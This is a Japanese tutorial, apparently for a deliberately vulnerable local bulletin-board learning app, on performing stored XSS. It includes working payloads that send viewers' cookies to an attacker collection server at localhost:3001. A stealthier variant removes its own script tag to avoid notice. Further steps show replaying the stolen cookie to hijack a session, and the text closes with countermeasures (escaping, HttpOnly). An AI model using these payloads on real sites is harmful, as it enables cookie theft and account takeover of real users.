# BBSシステムを利用したXSS攻撃のやり方

## タイプ1
### 手順1
XSSによって実行されるJavaScriptからの通信を受けとり情報を収集するサーバーを立ち上げる  
→`node trap-server.js`  
ここでIPアドレスを聞かれるが、タイプ1の攻撃では使用しないので適当に入力してOK  
3001番ポートで攻撃者のサーバーが立ち上がる

### 手順2
`/bbs1`にアクセスし、以下のような内容を書き込む

>こんにちは  
><script>
>document.write('<script src="http://localhost:3001/trap/' +encodeURIComponent(document.cookie)+ '"><'+'/script>');  
></script>

XHRでリクエストを送ろうとするとCORS関連が面倒なのでsrcのURLに情報を含めている。srcに指定しているURLからは空のファイルが返ってくるので、writeされたscriptタグでは何も実行されない。  
writeする文字列に`</script>`を含めると全体のscriptタグが終端してしまうため、`/script>`だけ別の文字列リテラルで記述して結合している。  
この時、攻撃者がログイン2~4(`/login2`~`/login4`)によってログインしていると、Cookieに保存された攻撃者のユーザー名とログイン判定に用いられるセッションID的な何か (ログイン時に発行して以降更新されないセキュリティガバガバシステムなのでセッションIDとは呼べなそう) が攻撃者のサーバーにconsole.logされる。攻撃者の情報を攻撃者が見てるだけなので、これだけでは問題なし。

しかし、攻撃者以外が閲覧した場合にもCookieが送信されてしまうため、これにより情報が盗まれてしまう。

### 手順3
手順2において書き込みをする際にログインしていなかった場合は、`/login2` ~ `/login4` のいずれかの方法によりログインし、Cookieにログイン情報が保持された状態にしておく。

### 手順4
ログインした状態で攻撃者の書き込みを含む掲示板を閲覧するとtrap-server.jsのコンソールに閲覧者のCookieが表示されるので、これを用いて不正にログイン状態を得る。

まずは、表示されたCookieをコピーする。  
その後ブラウザのF12から`document.cookie='コピーした文字列'`を実行する。ただしログインしていない状態から実行しないと意味がないので、ブラウザを変えるか、同じブラウザを使う場合は`/logout`でCookieを削除してから実行する。

その後`/requireLogin2` ~ `/requireLogin4` にアクセスし、ログイン済の状態でアクセスできることを確認する。ログイン画面に飛ばされてしまったら失敗なので、手順をもう一度確認。

## タイプ2
### 手順1
タイプ1と同じようにサーバーを立ち上げる。ただし、タイプ2はここで入力するIPアドレスを使うので、ちゃんと入力する。  
ブラウザから`localhost`でアクセスしている場合は、`localhost`でもよい。   
タイプ1のときの書き込みが残っていると重複して情報が送られてきて訳がわからなくなるので、`node update.js` しておく。  
(ユーザー情報も消えちゃうから、書き込みだけ消すスクリプトあったほうがいいのだろうけど、めんどくさいので書いてない)   
3001番ポートで攻撃者のサーバーが立ち上がる

### 手順2
`/bbs1`にアクセスし、以下のような内容を書き込む

>こんにちは<script class="trap-remove"  src="http://localhost:3001/trap.js" ></script>

こちらのパターンの場合、情報を送信する本体のプログラムは`trap.js`に書かれているが、送信する仕組みは同じ。  
(スクリプト内に登場するURLを動的に埋め込むために鯖の起動時にホスト名を入力している。)

タイプ1との違いは、class="trap-remove"で指定した scriptタグを消していること。またscriptタグの前の改行もないのでF12を開いても他の書き込みのタグと全く同じように見えるため、発覚しにくい。  
document.writeはあんまり使うなよって警告がConsoleに出るブラウザもあった気がするので、それも避けるなら`createElement`→`appendChild`とかすると良さそう

trap.jsにコードを書いているのは、消すためのコードが長すぎてこのBBSの制限である140字には収まらなかったため。

### 手順3,4
タイプ1と同じ。

## 対策
+ 表示HTMLを生成する際にタグをエスケープする(`/bbs2`に対策版あり)
+ CookieをJavaScriptから取得できないようにする(`HttpOnly`属性を付与)
+ 万が一Cookieを盗まれても乗っ取れないようにする(勉強中)